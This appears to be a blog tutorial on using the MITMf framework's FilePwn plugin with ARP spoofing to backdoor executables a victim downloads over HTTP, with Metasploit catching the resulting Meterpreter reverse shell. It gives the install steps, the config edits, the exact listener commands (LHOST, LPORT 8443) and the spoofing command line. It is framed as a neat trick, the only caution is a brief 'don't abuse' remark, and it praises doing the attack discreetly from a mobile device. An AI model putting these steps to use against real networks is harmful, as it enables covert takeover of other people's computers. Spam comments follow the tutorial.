How It Works

MITMf (if you don’t already know) is a man in the middle attack framwork. MITMf literally stands for “Man In The Middle framework.” It includes many, many different tools to help you with MitM attacks. In this case, we are automatically backdooring every downloaded executable for one specific machine. Cool, eh?

We will be ARP spoofing a Windows 8.1 VM machine in this test.

Note: This only works for HTTP sites, so you might want to use SSLstrip+ for any HTTPS sites.

Requirements

You will only need MITMf and Metasploit for this attack. You can download it from either the aptitude repository (apt-get install mitmf), or through the GitHub repository (git clone https://github.com/byt3bl33d3r/MITMf).If you choose to install via the apt, remember to run apt-get update first.Metasploit is build-in to Kali.

Step 1: Editing the Configurations

Now that we have MITMf installed, we need to edit the config files to match our system. We will edit the config file located in /usr/share/mitmf/config/mitmf.cfg.

Scroll down until you get to the FilePwn section.

You can see that under the CompressedFiles section, there is a configuration for many useful payloads. Set the HOST variable to match your IP, but don’t change the port. Just remember the port number for the payload you want to use.

Step 2: Selecting the Target

When we run MITMf with FilePwn, we want to listen for the payload specific to the target OS. In this case, I’m targeting a Windows 8.1 machine, so I would useWindowsIntelx86. The port number for that is 8443. Remember your payload’s port number for later.

Step 3: Set Up a Listener

We’re going to be using Metasploit as our payload listener. Type use multi/handler and then set your payload. in this case, I’m using Meterpreter.

set PAYLOAD windows/meterpreter/reverse_tcp

Set the LHOST and LPORT options…

set LHOST 10.0.2.117
set LPORT 8443
(Make sure you set the corresponding port number!)

Then exploit -j. Open up a new terminal…

Step 4: Running the Attack

To run the attack, use the following command:
mitmf –spoof –arp -i <interface> –gateway <gateway IP> –target <target IP> –filepwn

For me it would be:
mitmf –spoof –arp -i wlan0 –gateway 10.0.2.1 –target 10.0.2.15 –filepwn

Pretty soon you should be getting output like this:

If a user downloads a file, and the file is patchable. you should get some output saying “File patched successfully. Sending to target.” if it successfully backdoored. As soon as the victim opens the file, you should get a Meterpreter prompt.

If it doesn’t say it’s patched, it can’t be. Unfortunately, this tactic doesn’t work 100% of the time.

Conclusion

Now we know how to run a very neat trick–backdooring on the fly. This gets even better if you do this via mobile, as you will be very discrete. Don’t abuse this power. As said in the help menu for MITMf quoting Yoda, “Use wisely, young padawan.”

C|H of C3

                                 TUTORIAL

 

0 Replies to “Exploit Target Without Sending Anything”

  1. Spot on with this writeup, I actually believe this website needs a great deal more attention. Ill probably be returning to read through more, thanks for the info! cagakddckbed

  2. Thanks for this article. I’d also like to express that it can often be hard if you are in school and simply starting out to initiate a long credit standing. There are many students who are just trying to endure and have an extended or favourable credit history are often a difficult matter to have. gddbefefdebfedbk

  3. obviously like your website however you need to check the spelling on several of your posts. Several of them are rife with spelling issues and I to find it very bothersome to tell the truth on the other hand I will definitely come again again. ccgfddeaeegd

Schreiben Sie einen Kommentar

Ihre E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

000webhost logo